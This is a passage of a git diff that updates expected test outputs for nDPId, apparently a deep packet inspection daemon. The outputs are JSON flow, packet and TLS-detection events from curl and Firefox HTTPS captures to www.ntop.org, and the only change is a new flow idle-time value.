@@ -1,13 +1,13 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-curl.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581113120474} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581113120474,"flow_last_seen":1581113120474,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581113120474,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113120474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113120474,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7FgtjjAbvMd3aVAAAAALAC\/\/97wQAAAgQFtAEDAwUBAQgKHmJFtwAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113120512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113120512,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG72OOPktF9zHd2lqAS\/oj9JgAAAgQFrAQCCAolaAqTHmJFtwEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113120513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113120513,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7FgtjjAbvMd3aWj5LRfoAQECwaIgAAAQEICh5iRd0laAqT"} 
-00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113120474,"flow_last_seen":1581113120522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113120522,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581113120474,"flow_last_seen":1581113120563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581113120563,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113120474,"flow_last_seen":1581113120564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581113120564,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1581113120474,"flow_last_seen":1581113121570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":66816,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1581113121570,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581113120474,"flow_last_seen":1581113120474,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581113120474,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113120474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113120474,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7FgtjjAbvMd3aVAAAAALAC\/\/97wQAAAgQFtAEDAwUBAQgKHmJFtwAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113120512,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113120512,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG72OOPktF9zHd2lqAS\/oj9JgAAAgQFrAQCCAolaAqTHmJFtwEDAwc="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113120513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113120513,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7FgtjjAbvMd3aWj5LRfoAQECwaIgAAAQEICh5iRd0laAqT"} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113120474,"flow_last_seen":1581113120522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113120522,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581113120474,"flow_last_seen":1581113120563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581113120563,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113120474,"flow_last_seen":1581113120564,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581113120564,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1581113120474,"flow_last_seen":1581113121570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":66816,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1581113121570,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","packets-captured":109,"packets-processed":109,"total-skipped-flows":0,"total-l4-data-len":66816,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581113121570} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 109/109 diff --git a/test/results/443-firefox.pcap.out b/test/results/443-firefox.pcap.out index 2bf59f249..8ab707821 100644 --- a/test/results/443-firefox.pcap.out +++ b/test/results/443-firefox.pcap.out 
@@ -1,13 +1,13 @@ 00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-firefox.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581109488041} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109488041,"flow_last_seen":1581109488041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581109488041,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109488041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109488041,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs9oAbstYO2oAAAAALAC\/\/8dyQAAAgQFtAEDAwUBAQgKHivVZQAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109488079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109488079,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7z2h4KhDzLWDtqaAS\/ojkXQAAAgQFrAQCCAolMJ2OHivVZQEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109488079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109488079,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs9oAbstYO2peCoQ9IAQECwBWgAAAQEICh4r1YolMJ2O"} 
-00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109488041,"flow_last_seen":1581109488081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581109488081,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} -00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":667,"flow_first_seen":1581109488041,"flow_last_seen":1581109496480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":414073,"flow_avg_l4_payload_len":620,"midstream":0,"thread_ts_msec":1581109496480,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109488041,"flow_last_seen":1581109488041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581109488041,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109488041,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109488041,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs9oAbstYO2oAAAAALAC\/\/8dyQAAAgQFtAEDAwUBAQgKHivVZQAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109488079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109488079,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7z2h4KhDzLWDtqaAS\/ojkXQAAAgQFrAQCCAolMJ2OHivVZQEDAwc="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109488079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109488079,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs9oAbstYO2peCoQ9IAQECwBWgAAAQEICh4r1YolMJ2O"} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109488041,"flow_last_seen":1581109488081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581109488081,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} 
+00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":667,"flow_first_seen":1581109488041,"flow_last_seen":1581109496480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":414073,"flow_avg_l4_payload_len":620,"midstream":0,"thread_ts_msec":1581109496480,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","packets-captured":667,"packets-processed":667,"total-skipped-flows":0,"total-l4-data-len":414073,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581109496480} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 667/667 diff --git a/test/results/443-git.pcap.out b/test/results/443-git.pcap.out index eae19ce6d..01cba0337 100644 --- a/test/results/443-git.pcap.out +++ b/test/results/443-git.pcap.out 
